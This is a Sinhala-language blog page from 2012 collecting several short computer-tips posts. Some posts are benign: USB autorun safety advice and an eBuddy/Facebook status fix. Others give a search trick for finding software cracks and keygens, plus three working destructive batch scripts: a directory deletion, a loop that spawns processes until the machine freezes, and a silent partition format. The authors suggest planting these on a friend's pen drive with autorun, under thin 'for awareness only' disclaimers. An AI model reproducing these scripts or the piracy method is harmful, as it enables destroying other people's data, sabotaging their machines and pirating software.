Pages

Wednesday, May 16, 2012

Crack,Serial හොයන්න ලේසිම ක්‍රමයක්


හැමදාම හැමෝටම තියන ප්‍රශ්ණයක් තමයි Crack හරි Serial or Keygen හොයා ගන්නේ කොහොමද කියල, Game එකක් Software එකක් Download කරාම වැඩ කරන්නෙ නෑ, Serial numbers ඉල්ලනවා, ඉතින් මේකට විසදුම තමයි Crack හරි Serial Keygen Download කර ගන්න එක , ඒක ලොකු ප්‍රශ්නයක් හැමොටම, ඒක පුදුම අමාරු එපාම කරපු වැඩක් හැටියටයි හැමොම දකින්නේ, ඒත් ඒ හරියට මේ ගැන දන්නේ නැති නිසයි, අපිට Crack හරි Serial හරි ලේසියෙන්ම හොයන්න ක්‍රමයක් තියනව, පොඩිම පොඩි වැඩක් මේක, Try කරල බලන්නකො මේක කරන්නෙ මෙහෙමයි,Search කරන්න ඕනේ එකට කලින් 94fbr කියල Type කරල පස්සේ ඔයාට ඕනෙ කරන Soft/Game එකේ නම type කරන්න, දැන් Search පාරක් දෙන්න, දැන් ඕනෙ තරම් Crack, Serial , Keygen එයිඔන්න කිසිම ප්‍රශ්ණයක් නෑ වැඩේ ගොඩ, ඕනෙම Keygen එකක් හරි Serial එකක් හරි Crack එකක් හරි මෙහෙම හොයා ගන්න පුලුවන්, දැන් ඔන්න කාගෙන්වත් අහන්න ඕනේ වෙන්නේ නෑ, ඔයාටම වැඩ්ඩා වෙන්න පුලුවන් හැමෝම ඉස්සරහ, අයෙත් වදයකුත් නෑ හොයන්න, හොදයි නේද යාලුවනේ?

Tuesday, May 15, 2012

Pen එකෙන් එන Virus වලින් බේරෙන්න හරිම ක්‍රමය

හැමදාම මම වයිරස් ගැන මොනවා හරි දානවනේ, අද දාන්න යන්නේ වයිරස් වලින් බේරෙන ක්‍රමයක් ගැනයි, සාමාන්‍යයෙන් අපිට තියන ලොකුම වදයක් තමයි අපේ Pen එකෙන් වයිරස් අපේ පරිගණකයට එන එක, හැමොම හිතන් ඉන්නේ සුපිරි වයිරස්ගාර්ඩ් එකක් තිබ්බනම් බය වෙන්න දෙයක් නෑ කියලයි, ඒත් ඇත්ත ඒක නෙමෙයි, වයිරස් ගාර්ඩ් වලින් අල්ලන්න බැරි වයිරස් තියෙනවා, දවසකට අලුතෙන් වයිරස් 250ක් විතර අලුතෙන් එකතු වෙනවලු, මට එකේ ගාණ හරියට මතකනම් නෑ, ඒත් හැමදාම ගොඩක් වයිරස් අපේ ලෝකෙට මුදා හරිද්දි ඒ ඔක්කම අප්ඩෙට් වෙන්නෙ නෑ එක දවසෙන් අපේ වයිරස් ගාර්ඩ් එකට, ඉතින් කොච්චර ස්කෑන් කරත් වැඩක් වෙන්නේ නෑ සමහර වයිරස් වලට, ඉතින් විසදුම මේකයි, මම මේ කියන විදිහට කරන්න,
Pen එක හැමෝටම දීල ගෙදර ගෙනත් එක පාරම ඔයගේ කම්පියුටර් එකට ගහන්න එපා, හැමදේටම කලින් මේ විදිහට කරන්න, ඔයාලා දන්නවනේ අපේ Key Board එකේ තියනව Start කියල Button එකක් (Win Key එක), හරි ඔයා පෙන් එක ගහන්න කලින් ඒ Start Button එකයි Key board එකේ L button එකයි දෙකම එකට Press කරන්න,
Start+L
දැන් Log off වෙයි, දැන් ඔයාගේ Pen එක ගහන්න, ප්‍රශ්ණයක් නෑ, ඊට පස්සේ තප්පර 5ක් 10ක් විතර පොඩ්ඩක් වෙලා ඉන්න, මෙහෙම කරාම Auto Run වැඩ කරන්නේ නෑ, Auto run වැඩ කරන්නේ නැති වෙන්න හදල තියෙන්නේ මම දන්න තරමින් Avast Virus Guard එක විතරයි, ඉතින් ඒක නිසා මෙහෙම කරන එක වැඩි ආරක්ෂාවත් එක්ක හොදයිනේ,
දැන් ආයෙත් Log වෙන්න,
දැන් My Computerගිහින් එක පාරටම Pen එක Open කරන්න හදන්න එපා, එහෙම උනොත් Auto Run තියනවනම් Open වෙලා අපේ Computer එකට වයිරස් Attack කරන්න පුලුවන්, කැමතිනම් ඔයගේ වයිරස් ගාර්ඩ් එකෙන් පොඩි Scan පාරක් දාන්න, දැන් වයිරස් තිබ්බොත් ඒවා වයිරස් ගාර්ඩ් එකෙන්ම අයින් කරන්න,
දැන් My Computer Open කර ගන්න, දැන් ඔයාට තියෙන්නේ මේ ක්‍රමය පොඩ්ඩක් බලන්නයි
Side එකේ පහල ඔයගේ Pen එක පෙන්නනව නේද? එතන Click කරන්න, Pen එක Open වෙයි, පහල තියන එකේ වගේම එතන Pen එක පෙන්නන තැන Click කරන්න, Auto run වැඩ කරන්නේ නෑ, බය වෙන්න දෙයක් නෑ,
Windows XP තියන අයට මේ Explorer එක Open කර ගන්න Folder Mark එක Click කරාම එනවා, උඩ තියනව ඒක පොඩ්ඩක් බලන්නකො, අනිත් එක එහෙම නැත්තම් Address Bar එක Click කරල එතනින් එන ලිස්ට් එකෙන් Pen එක Select කරානම් ඒත් හරි,
මෙහෙම දෙයක් තියනව, Pen එකෙ Auto run විතරයි වැඩ කරන්නේ නැත්තේ, එත් Pen එකේ වයිරස් තියෙන්න පුලුවන්, එවත් අල්ලන්න ක්‍රම තියනව,
හරි ඒකට මෙහෙම කරන්න ඕනේ
ඔයාගේ OS එක Windows7 නම් මෙහෙම කරන්න
Organize —> Folder and Search Option —> View
දැන් මෙතනින් 1 කියල මම දීල තියන තැනට ටික් එකක් දාන්න, ඒ කියන්නේ Show hidden files. folders, or drives  තැන Click කරන්න
මෙන්න මේ 2 කියල මම දීල තියන සෙට් දෙකේ ටික් අයින් කරන්න
ඔයාගේ OS එක Windows XPනම් මෙහෙම කරන්න
Tools —> Folder Option —> View
දැන් මෙතනින් 1 කියල මම දීල තියන තැනට ටික් එකක් දාන්න, ඒ කියන්නේ Show hidden files. folders, or drives  තැන Click කරන්න
මෙන්න මේ 2 කියල මම දීල තියන සෙට් දෙකේ ටික් අයින් කරන්න
 
Apply කරල OK කරන්න,
දැන් සිස්ටම් ෆයිල් විදිහට තිබුණ ඕනෙම ෆයිල් එකක් පෙන්නයි, ඔන්න Auto run එකක් Pen එක ඇතුලෙ තියනවනම් දැන් බලා ගන්න පුලුවන්, Hidden කරපු Virus ඔක්කමත් ඔන්න පෙන්නයි, ඔයාල දන්නවද සමහර වයිරස් තියනව අපේ Pen එකේ ෆොල්ඩර් Hidden කරලා වයිරස් ෆොල්ඩර්  අපේ තිබුණ ෆොල්ඩර් නමින් හදනවා, ඉතින් අපි දන්නෙ නැතුව Double Click කලොත් අපේ Computer එකට ඒ Virus එක Attack කරනව නිකම්ම, කොහොමද අපි මේවා හොයා ගන්නේ, හරිම ලේසි, කවදාවත් Folder එකකට Extension එකක් නෑ, එහෙනම් ඒ Virus එකක්,  ඉතින් මෙහෙම ඒවට එකක් තියනවනේ ඔන්න හොයා ගන්න එක ක්‍රමයක්,
තව මෙහෙම තියනවනම් ඒවත් වයිරස් වෙන්න පුලුවන් ගොඩාක් දුරට,
.BAT .EXE .SCR මේ වගේ ඒවා,
ඉතින් දන්නෙ නැති ඕනෙම File එකක් Delete කරල දාල ඔයාට වලින් බේරෙන්න පුලුවන් දැන් කිසිම ප්‍රශ්ණයක් නැතුවම, ගොඩාක් මහන්සි වෙලා මේක ලිවුවේ, ඔයාල දෙයක් ගත්තනම් ලොකු දෙයක්, මේක වරදින්න විදිහක් නෑ කොහොමටවත්ම, ආයෙත් Pen වලින් කරදරයක් නෑ ඔන්න,
ප.ලි.
තවත් දෙයක් මතක් කරල C partition එකේ මොනවත්ම Delete කරන්න නම් එපා, ඒකේ තියෙන්නේ වයිරස් නෙමෙයි, අනිත් කාරණය තමයි සමහරවිට Hidden File පෙන්නන්නෙ නැතිවේයි, ඒ ඔයාගේ එකට දැනටමත් වයිරස් කරල නිසයි, ඒකට පස්සෙ හොදම විසඩුම කරල දාන එකයි                        E.m. Nimesh K Amarasinghe 

උපුටා ගැනීම E.m. Nimesh K Amarasinghe 

වයිරස් එකක් හදල My Document එක Delete කරල දාමුද?

වයිරස් එකක් හදල My Document එක Delete කරල දාමුද? මේකට කරන්න තියෙන්නේ මෙච්චරයි,
 හැමදාම වගේම මේකත් Notpad සෙල්ලමක්, මම මේ පහල දීල තියන  Code එක Copy කරල
 Notepad එකේ paste කර ගන්න,
rmdir C:\Documents and Settings \S\Q
 හේ හේ දැන් මේක Save කරගන්නයි තියෙන්නෙ, හැමදාම මම කියනවනේ Extension එක 
ගැන මේකෙත් කැමති නමක් දිලා අවසානේ Extension එකට .BATකියල දීලා Save කරන්න, 
වැඩේ ගොඩ,
 මේකටත් Auto Run එකක් දාල පාවිච්චි කරන්න පුලුවන් යාළුවනේ

උපුටා ගැනීම E.m. Nimesh K Amarasinghe 

ලංකාවෙ පලමු වතාවට ෆොන්ට් 5000 ක්


ඔන්න ඹයාල හැමෝටම මගෙන් අලුත් අවුරුද්දට බර තෑග්ගක්...ලංකාවෙ පලමු වතාවට ෆොන්ට් 5000 ක් 
Blog අඩවියකින් දෙන්න කියලා.සිංහල ඒවාත් 2000 ක් විතර මෙතන තියනවා.මම ගාව තිබුනු හැම font එකක්ම
මෙතනට දාල තියනවා.size අඩුවෙන්න ටිකක් වැඩිපුර compresed කරල තියන්නෙ.

ඔයාලා කැමතිනම් විතරක් ඇවිත් බාගන්න......


ඔන්න මම ගියා .. ලකිඳු හංසක

Monday, May 14, 2012

Computer එක Stuck කරල දාමුද?


Computer එක Stuck කරල දාමුද?


කාගේ හරි Computer එකක් Stuck කරලම දාන්න පුලුවන්
 ක්‍රමයක් තමයි මම මේ කියන්න හදන්නේමේකෙන් කාටවත් 
කරදරයක් කරන්න එපා
ඒත් පොඩි ජොලි වැඩක්,


@echo off
:A
start iexplore.exe
start run
start explorer
start dir
start command

මෙතන තියන code එකේ start කියල තියෙන 
ටික පුලුවන් තරම් Copy කරල Saveකර ගන්න,
වැඩියෙන් දැම්මොත්ඉක්මනින් Stuck වෙයි හේහේ

Ex-:

@echo off
:A
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command

දැන් තියෙන්නේ මේක Save කරන්න Save as ගිහින් 
ඕක කැමති  නමක් දීලා Save කරන්න පුලුවන්
ඊට පිටිපස්සෙන් තියෙන්නේ File එකේ extension එක
මතක් කරල ඔයාල දුන්න නම අවසානෙට 
මෙහෙම Type කරන්න.  .bat

ඔන්න වැඩේ හරි දැන්,

මේක test කරල බලන්න ඕනෙනම් code වැඩිය 
දාන්නේ නැතුව test කරල බලන්න. මුකුත් ප්‍රශ්ණයක්
 වෙන්නේ නැ

මේකෙන් වැඩියෙන් දැම්මොත් අනිවර්යෙන් Stuck වෙනවමයිහේ හේඑච්චරයි,මේකටත් Auto run එකක් ලියල දැම්මනම් ගොඩේ ගොඩ
~~Lakindu Hansaka~~

මෙහෙම දේවල් කරන්න පුළුවන් ඔයාලගේ යාලුවන්ටත් පරිස්සම් වෙන්න යාලුවනේ

මෙහෙම දේවල් තියනවා පරිස්සම් වෙන්න යාලුවනේ


මේක කියන්නෙ දෑන ගන්න ඔනෙ නිසා හැමොම,  මේක Partition එකක් ෆුල්ම ෆොර්මෑට් කරල දාන්න පුලුවන් වැඩක්,  මේක හොදටම වැඩනම් XP වලට, දන්නෙ නැති කෙනෙක්ගෙ උනත් Win7 වලට උනත් මෙහෙම කරල Hard එකෙ Partition එකක් ෆුල් Format එකක් දෙන්න පුලුවන්,  මේක දාන්නෙ ඔයලගෙ දෑනුමට, මෙහෙම දේවල්වලින් ආරක්ෂා වෙන්න, මුලින්ම Notepad එක Open කර ගන්න ඊට පස්සෙ මේක Copy ---> Paste කර ගන්න.

md Hacked_By_Lakindu
Format L:
/ Y Enter

 nimeshtech කියන එක වෙනුවට ඔයාලගෙ නම එතනට දෙන්න පුලුවන් Format L කියන 
තෑනට C partition එක වෙනුවට කෑමති එකක් දෙන්න පුලුවන්,  මේක D එක එහෙම දාල බලන්නකො හේහේ, 
ඊට පස්සෙ  
මේක Save කර ගන්න ඔනෙ Save as ගිහින් එතන කෑමති නමක් එකක් දීල අවසානේට .bat කියල දෙන්න, Save as type කියන තෑන All Files දෙන්න, ඊට පස්සෙ Save කරන්න, දෑන්  මේක Open කරන්න එහෙම එපා මචො, දාපු Partition එක Format වෙලාම යාවි, දැන්  මේකට පොඩි Auto Run File එකක් ලියල Pen එකකට වගෙ දාල යාලුවෙකුට දුන්නනම් මල කෙලියයි, එහෙම කරන්න එපා මොකද අපි කරන නරක වැඩ මේ ලොකෙ දෙවියො ස්වබාව ධර්මය බලන් ඉන්නව,  මේක ඔයලගෙ  ආරක්ෂාවට කියල දුන්නෙ, සමහර විට මේක ගොඩක් අය දන්නවත් ඇති, එත් නොදන්න අය  ආරක්ෂා වෙන්න ඔනේ,, එක නිසයි දෑම්මෙ, නරක වෑඩ කවදාවත් හොද නැ දැනුමටම විතරයි  මේක,

මට තරහා කාරයෙක් හිටිය කියල මෙහෙම කරන්න එපා කාටවත්.. දන්නා ඒවා කියන්න පුළුවන් එත් මේවා කාටවත්
කරන්න එපා.. ඒ පවා එන්නෙත් මන් උඩට ..

 think and do it and try it
 ~~ලකිඳු හංසක ~~   E.m. Nimesh K Amarasinghe 

උපුටා ගැනීම    E.m. Nimesh K Amarasinghe  

ebuddy නිසා ෆේස්බුක් නිතරම ඔන්ලයින් පෙන්වීමේ දෝෂයට පොඩි විසදුමක්

ebuddy නිසා ෆේස්බුක් නිතරම ඔන්ලයින් පෙන්වීමේ දෝෂයට පොඩි විසදුමක්



ebuddy එකට වෙලා දැන්  කට්ටිය හැම වෙලාවෙම චැට් කරනවනේ, එත් හිටපු ගමන් ෆෝන් වලින් ෆේස්බුක් ඔන්ලයින් එන අයට තියන ප්‍රශ්ණයක් තමයි නිතරම තමාව ඔන්ලයින් පෙන්වීම.                        මේක වෙන්නේ  ebuddy වල චැට් disconnect උනහම, 
එහෙම ඔන්ලයින් පෙන්නන්න ගත්තම ඉතින් කම්පියුටරෙන් ඒ අකවුන්ට් එකට ලොග් වෙලා ලොග් අවුට් කරත් එකදිගට ඔන්ලයින් පෙන්නනවා. ඒක තමයි ලොකුම ප්‍රශ්ණය, යාලුවො හිතන්නේ ඔයා ඔන්ලයින් ඉන්නවා කියලා, එත් ඔයා කතා කරන්නේ නැති නිසා තරහ වෙනවා, ඒකනේ අවුල, මේකට තියන විසදුම තමයි ඒ Account ඒක deativate කරලා ආපහු activate කරන ඒක.එහෙම කරාම වැඩේ හරි

think and do it and try it
~~Lakindu Hansaka~~

උපුටා ගැනීම E.m. Nimesh K Amarasinghe